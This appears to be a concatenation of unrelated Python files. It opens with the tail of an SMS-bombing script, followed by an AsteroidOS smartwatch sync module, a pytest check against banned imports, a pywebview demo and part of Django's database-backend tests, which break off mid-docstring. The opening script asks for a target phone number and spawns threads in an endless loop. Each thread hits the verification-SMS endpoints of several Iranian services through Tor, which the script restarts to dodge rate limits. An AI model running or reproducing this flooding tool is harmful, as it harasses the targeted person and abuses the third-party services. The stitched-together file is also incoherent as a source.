gapR = requests.get("https://core.gap.im/v1/user/add.json?mobile=%2B{}".format(phone.split("+")[1]), headers=gapH, proxies=proxy)
if "OK" in gapR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def tap30(phone):
#tap30 api
tap30H = {"Host": "tap33.me","Connection": "keep-alive","Content-Length": "63","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "application/json","Accept": "*/*","Origin": "https://app.tapsi.cab","Sec-Fetch-Site": "cross-site","Sec-Fetch-Mode": "cors","Sec-Fetch-Dest": "empty","Referer": "https://app.tapsi.cab/","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
tap30D = {"credential":{"phoneNumber":"0"+phone.split("+98")[1],"role":"PASSENGER"}}
try:
tap30R = requests.post("https://tap33.me/api/v2/user", headers=tap30H, json=tap30D, proxies=proxy)
if "OK" in tap30R.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def emtiaz(phone):
#emtiaz api
emH = {"Host": "web.emtiyaz.app","Connection": "keep-alive","Content-Length": "28","Cache-Control": "max-age\u003d0","Upgrade-Insecure-Requests": "1","Origin": "https://web.emtiyaz.app","Content-Type": "application/x-www-form-urlencoded","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","Accept": "text/html,application/xhtml+xml,application/xml;q\u003d0.9,image/webp,image/apng,*/*;q\u003d0.8,application/signed-exchange;v\u003db3;q\u003d0.9","Sec-Fetch-Site": "same-origin","Sec-Fetch-Mode": "navigate","Sec-Fetch-User": "?1","Sec-Fetch-Dest": "document","Referer": "https://web.emtiyaz.app/login","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","Cookie": "__cfduid\u003dd3744e2448268f90a1ea5a4016884f7331596404726; __auc\u003dd86ede5a173b122fb752f98d012; _ga\u003dGA1.2.719537155.1596404727; __asc\u003d7857da15173c7c2e3123fd4c586; _gid\u003dGA1.2.941061447.1596784306; _gat_gtag_UA_124185794_1\u003d1"}
emD = "send=1&cellphone=0"+phone.split("+98")[1]
try:
emR = requests.post("https://web.emtiyaz.app/json/login", headers=emH, data=emD, proxies=proxy)
print ("sended sms:)")
except:
print ("Error!")
def divar(phone):
#divar api
divarH = {"Host": "api.divar.ir","Connection": "keep-alive","Content-Length": "22","Accept": "application/json, text/plain, */*","User-Agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","Content-Type": "application/x-www-form-urlencoded","Origin": "https://divar.ir","Sec-Fetch-Site": "same-site","Sec-Fetch-Mode": "cors","Sec-Fetch-Dest": "empty","Referer": "https://divar.ir/my-divar/my-posts","Accept-Encoding": "gzip, deflate, br","Accept-Language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
divarD = {"phone":phone.split("+98")[1]}
try:
divarR = requests.post("https://api.divar.ir/v5/auth/authenticate", headers=divarH, json=divarD, proxies=proxy)
if "SENT" in divarR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def rubika(phone):
#rubika api
ruH = {"Host": "messengerg2c4.iranlms.ir","content-length": "96","accept": "application/json, text/plain, */*","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","content-type": "text/plain","origin": "https://web.rubika.ir","sec-fetch-site": "cross-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://web.rubika.ir/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6"}
ruD = {"api_version":"3","method":"sendCode","data":{"phone_number":phone.split("+")[1],"send_type":"SMS"}}
try:
ruR = requests.post("https://messengerg2c4.iranlms.ir/", headers=ruH, json=ruD, proxies=proxy)
if "OK" in ruR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def torob(phone):
#torob api
torobH = {"Host": "api.torob.com","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","accept": "*/*","origin": "https://torob.com","sec-fetch-site": "same-site","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://torob.com/user/","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","cookie": "amplitude_id_95d1eb61107c6d4a0a5c555e4ee4bfbbtorob.com\u003deyJkZXZpY2VJZCI6ImFiOGNiOTUyLTk1MTgtNDhhNS1iNmRjLTkwZjgxZTFjYmM3ZVIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU5Njg2OTI4ODM1MSwibGFzdEV2ZW50VGltZSI6MTU5Njg2OTI4ODM3NCwiZXZlbnRJZCI6MSwiaWRlbnRpZnlJZCI6Miwic2VxdWVuY2VOdW1iZXIiOjN9"}
try:
torobR = requests.get("https://api.torob.com/a/phone/send-pin/?phone_number=0"+phone.split("+98")[1], headers=torobH, proxies=proxy)
if "sent" in torobR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def bama(phone):
#bama api
bamaH = {"Host": "bama.ir","content-length": "22","accept": "application/json, text/javascript, */*; q\u003d0.01","x-requested-with": "XMLHttpRequest","user-agent": "Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.111 Mobile Safari/537.36","csrf-token-bama-header": "CfDJ8N00ikLDmFVBoTe5ae5U4a2G6aNtBFk_sA0DBuQq8RmtGVSLQEq3CXeJmb0ervkK5xY2355oMxH2UDv5oU05FCu56FVkLdgE6RbDs1ojMo90XlbiGYT9XaIKz7YkZg-8vJSuc7f3PR3VKjvuu1fEIOE","content-type": "application/x-www-form-urlencoded; charset\u003dUTF-8","origin": "https://bama.ir","sec-fetch-site": "same-origin","sec-fetch-mode": "cors","sec-fetch-dest": "empty","referer": "https://bama.ir/Signin?ReturnUrl\u003d%2Fprofile","accept-encoding": "gzip, deflate, br","accept-language": "fa-IR,fa;q\u003d0.9,en-GB;q\u003d0.8,en;q\u003d0.7,en-US;q\u003d0.6","cookie": "CSRF-TOKEN-BAMA-COOKIE\u003dCfDJ8N00ikLDmFVBoTe5ae5U4a1o5aOrFp-FIHLs7P3VvLI7yo6xSdyY3sJ5GByfUKfTPuEgfioiGxRQo4G4JzBin1ky5-fvZ1uKkrb_IyaPXs1d0bloIEVe1VahdjTQNJpXQvFyt0tlZnSAZFs4eF3agKg"}
bamaD = "cellNumber=0"+phone.split("+98")[1]
try:
bamaR = requests.post("https://bama.ir/signin-checkforcellnumber", headers=bamaH, data=bamaD, proxies=proxy)
if "0" in bamaR.text:
print ("sended sms:)")
else:
print ("Error!")
except:
print ("Error!")
def main():
phone = str(input("Target Phone (+98xxx): "))
while True:
Thread(target=snap, args=[phone]).start()
Thread(target=shad, args=[phone]).start()
Thread(target=gap, args=[phone]).start()
Thread(target=tap30, args=[phone]).start()
Thread(target=emtiaz, args=[phone]).start()
Thread(target=divar, args=[phone]).start()
Thread(target=rubika, args=[phone]).start()
Thread(target=torob, args=[phone]).start()
Thread(target=bama, args=[phone]).start()
os.system("killall -HUP tor")
time.sleep(3)
if __name__ == "__main__":
main()
|
module.py
|
import time
import logging
import queue
import threading
import mpd
import pyowm
import pydbus as dbus
from asteroid import Asteroid, DBusEavesdropper, WeatherPredictions
from gi.repository import GLib
def merge_dicts(first, second):
""" Recursively deep merges two dictionaries """
ret = first.copy()
for k, v in second.items():
if isinstance(v, dict) and k in first and isinstance(first[k], dict):
ret[k] = merge_dicts(first[k], v)
else:
ret[k] = v
return ret
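# Illustrative example (not part of the original module) of the deep merge above:
#
#   merge_dicts({"a": {"b": 1}, "x": 1}, {"a": {"c": 2}, "x": 2})
#   # -> {"a": {"b": 1, "c": 2}, "x": 2}   (the second argument wins on conflicts)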
class MetaModule(type):
def __init__(self, name, bases, dict_):
self.logger = logging.getLogger(name)
class Module(metaclass=MetaModule):
defconfig = dict()
def __init__(self, **kwargs):
self.config = merge_dicts(self.defconfig, kwargs)
def register(self, app):
self.app = app
self.asteroid = app.asteroid
self.asteroid.dev.properties_changed.connect(self._properties_changed)
def _properties_changed(self, name, changed, lst):
pass
class TimeSyncModule(Module):
def register(self, app):
super(TimeSyncModule, self).register(app)
        # We want to do this on startup, but as the dbus-is-blocking issue is
# not solved yet, be careful
if self.asteroid.dev.connected:
self._update_time()
def _update_time(self):
self.asteroid.update_time()
self.logger.info("Time synchronized")
def _properties_changed(self, name, changed, lst):
if changed.get("Connected", False):
self._update_time()
class ReconnectModule(Module):
defconfig = {"timeout_base": 5,
"timeout_max": 300,
"timeout_reset": 120}
def __init__(self, **kwargs):
super(ReconnectModule, self).__init__(**kwargs)
self._last_connected = 0.0
self._timeout = 0
self._condvar = threading.Condition()
self._thread = threading.Thread(target=self._reconnect_fn)
self._thread.daemon = True
def register(self, app):
super(ReconnectModule, self).register(app)
self._thread.start()
def _reconnect_fn(self):
while True:
self._condvar.acquire()
while self.asteroid.dev.connected:
self._condvar.wait(10)
self._condvar.release()
dt = time.time() - self._last_connected
if dt > self.config["timeout_reset"]:
self._timeout = 0
if self._timeout > 0:
self.logger.info("Reconnecting in %d seconds..." % self._timeout)
time.sleep(self._timeout)
else:
self.logger.info("Reconnecting...")
self.asteroid.connect()
self._timeout = min(self._timeout + self.config["timeout_base"],
self.config["timeout_max"])
self.logger.info("Connected!")
def _properties_changed(self, name, changed, lst):
if not changed.get("Connected", True):
self._condvar.acquire()
self._condvar.notify()
self._condvar.release()
elif changed.get("Connected", False):
self._last_connected = time.time()
class NotifyModule(Module):
def register(self, app):
super(NotifyModule, self).register(app)
self._pending = queue.Queue()
self._eavesdropper = DBusEavesdropper(
dbus.SessionBus(),
"org.freedesktop.Notifications",
"Notify",
self._on_notification)
def _notification_send(self):
try:
msg = self._pending.get_nowait()
app_name, id_, app_icon, summary, body, actions, hints, \
expiration = msg.get_body()
self.asteroid.notify(summary, body=body,
id_=(id_ if id_ else None),
app_name=app_name, app_icon=app_icon)
self.logger.info("Sent notification '%s'" % summary)
except queue.Empty:
pass
return bool(self._pending.qsize())
def _on_notification(self, msg):
self._pending.put(msg)
GLib.idle_add(self._notification_send)
class OWMModule(Module):
defconfig = {"update_interval": 2 * 60 * 60 }
def register(self, app):
super(OWMModule, self).register(app)
self._update_weather()
GLib.timeout_add_seconds(self.config["update_interval"], self._update_weather)
def _update_weather(self):
try:
owm = pyowm.OWM(self.config["api_key"])
# TODO: Eventually, autodetecting the location would be nice
forecast = owm.daily_forecast(self.config["location"]).get_forecast()
preds = WeatherPredictions.from_owm(forecast)
self.asteroid.update_weather(preds)
self.logger.info("Weather update sent")
except Exception as e:
# We can't str the exception directly, because a bug in PyOWM python3
# support would lead to another exception
self.logger.error("Weather update failed with %s" % type(e))
return True
class MPDModule(Module):
defconfig = {
"host": "127.0.0.1",
"port": 6600,
"reconnect_period": 5
}
def __init__(self, **kwargs):
super(MPDModule, self).__init__(**kwargs)
self._mpd_watch = self._make_mpd(connect=False)
def _properties_changed(self, name, changed, lst):
if changed.get("Connected", False):
self._send_update()
def _make_mpd(self, connect=True):
cl = mpd.MPDClient()
cl.timeout = 10
if connect:
cl.connect(self.config["host"], self.config["port"])
return cl
def register(self, app):
super(MPDModule, self).register(app)
self.asteroid.register_media_listener(self._command_cb)
GLib.timeout_add_seconds(self.config["reconnect_period"], self._mpd_reconnect)
def _mpd_connection_error_cb(self, src=None, cond=None):
self.logger.warn("MPD connection error, scheduling reconnect")
GLib.timeout_add_seconds(self.config["reconnect_period"],
self._mpd_reconnect)
return False
def _mpd_reconnect(self):
try:
self._mpd_watch.connect(self.config["host"], self.config["port"])
except ConnectionRefusedError as e:
return True
except mpd.ConnectionError:
return False
self.logger.info("MPD connected")
self._send_update()
self._mpd_watch.send_idle()
GLib.io_add_watch(self._mpd_watch, GLib.IO_ERR | GLib.IO_HUP | GLib.IO_NVAL,
self._mpd_connection_error_cb)
GLib.io_add_watch(self._mpd_watch, GLib.IO_IN, self._mpd_cb)
return False
def _send_update(self):
try:
song = self._mpd_watch.currentsong()
status = self._mpd_watch.status()
self.asteroid.update_media(
song.get("title", "Unknown"),
song.get("album", "Unknown"),
song.get("artist", "Unknown"),
status["state"] == "play"
)
except mpd.ConnectionError as e:
self.logger.warn("Attempt to update MPD status failed with %r" % e)
def _mpd_cb(self, src, cond):
try:
changes = self._mpd_watch.fetch_idle()
if "player" in changes:
self._send_update()
self._mpd_watch.send_idle()
except (mpd.ConnectionError, mpd.PendingCommandError) as e:
self.logger.warn("MPD idle fetch failed with %r" % e)
return False
return True
def _command_cb(self, cmd):
try:
mpd = self._make_mpd()
if cmd == Asteroid.MEDIA_COMMAND_PREVIOUS:
mpd.previous()
elif cmd == Asteroid.MEDIA_COMMAND_NEXT:
mpd.next()
elif cmd == Asteroid.MEDIA_COMMAND_PLAY:
mpd.play()
elif cmd == Asteroid.MEDIA_COMMAND_PAUSE:
mpd.pause()
else:
self.logger.error("Unknown media command code %02x" % cmd)
mpd.close()
except Exception as e:
self.logger.warn("Attempted to send media command %02x but failed with %r" % (cmd, e))
|
test_sanity.py
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import importlib
import logging
import pkgutil
from collections import defaultdict
import pytest
from multiprocessing import Queue, Process
from six import PY2
def import_submodules(package_name, skip_list):
""" Import all submodules of a module, recursively, including subpackages.
`skip_list` denotes packages that should be skipped during the import"""
package = importlib.import_module(package_name)
results = []
for loader, name, is_pkg in pkgutil.walk_packages(package.__path__):
full_name = package.__name__ + '.' + name
if full_name not in skip_list:
imported_module = importlib.import_module(full_name)
if PY2:
reload(imported_module)
else:
importlib.reload(imported_module)
results.append(full_name)
if is_pkg:
results += import_submodules(full_name, skip_list)
return results
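# Illustrative example (not part of the original test module): assuming a package
# named "mynlu" is importable, the helper above walks it recursively, e.g.
#
#   import_submodules("mynlu", skip_list=set())
#   # -> ["mynlu.foo", "mynlu.foo.bar", ...]   (hypothetical module names)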
@pytest.mark.parallel
def test_no_global_imports_of_banned_package():
"""This test ensures that neither of the banned packages are imported module wise in any of our code files.
If one of the dependencies is needed, they should be imported within a function."""
banned_packages = ["spacy", "mitie", "sklearn", "duckling"]
q = Queue()
# Import tracking needs to be run in a separate process to ensure the environment is clean...
p = Process(target=get_tracked_imports, args=(q,))
p.start()
    tracked_imports = q.get(block=True)  # the import tracking function puts its results in the queue once it has finished
def find_modules_importing(name):
return {v for k, vs in tracked_imports.items() if k.startswith(name) for v in vs}
for banned_package in banned_packages:
assert not find_modules_importing(banned_package), \
"No module should import {} globally. Found in {}".format(
banned_package, ", ".join(find_modules_importing(banned_package)))
def get_tracked_imports(q):
import inspect
    # To track imports across modules, we will replace the default import function
try:
# noinspection PyCompatibility
import __builtin__
original_import_function = __builtin__.__import__
except ImportError:
# noinspection PyCompatibility
import builtins
original_import_function = builtins.__import__
tracked_imports = defaultdict(list)
def import_tracking(name, *x, **xs):
caller = inspect.currentframe().f_back
caller_name = caller.f_globals.get('__name__')
tracked_imports[name].append(caller_name)
return original_import_function(name, *x, **xs)
if PY2:
__builtin__.__import__ = import_tracking
else:
builtins.__import__ = import_tracking
# import all available modules and track imports on the way
import_submodules("mynlu", skip_list={})
if PY2:
__builtin__.__import__ = original_import_function
else:
builtins.__import__ = original_import_function
q.put(tracked_imports)
|
load_html.py
|
"""
This example demonstrates how to load a URL and evaluate JavaScript in a web view window
"""
import webview
import threading
import time
def load_html():
webview.load_url("http://www.baidu.com")
print(123123)
time.sleep(2)
webview.evaluate_js('alert("w00t")')
print(2222)
if __name__ == '__main__':
t = threading.Thread(target=load_html)
t.start()
webview.config.use_qt = True
    # Create a resizable webview window with 800x600 dimensions
webview.create_window("Simple browser", width=800, height=600, resizable=True)
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
from decimal import Decimal, Rounded
import re
import threading
import unittest
import warnings
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (connection, connections, DEFAULT_DB_ALIAS,
DatabaseError, IntegrityError, reset_queries, transaction)
from django.db.backends import BaseDatabaseWrapper
from django.db.backends.signals import connection_created
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.utils import format_number, CursorWrapper
from django.db.models import Sum, Avg, Variance, StdDev
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (TestCase, TransactionTestCase, mock, override_settings,
skipUnlessDBFeature, skipIfDBFeature)
from django.test.utils import ignore_warnings, str_prefix
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils.six.moves import range
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
        Test that an empty DATABASES setting defaults to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses("PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 90301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql_psycopg2.base import DatabaseWrapper
version_path = 'django.db.backends.postgresql_psycopg2.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(DatabaseWrapper.psycopg2_version.__get__(self), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(DatabaseWrapper.psycopg2_version.__get__(self), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
        Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
        Test the custom ``django_date_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
        Test that last_executed_query() returns a Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be good ones to run on all
# backends, but they break MySQL hard. Until #13711 is fixed, they can't be run
# everywhere (although they would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
    check that it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
        # A full flush is expensive for the whole test run, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
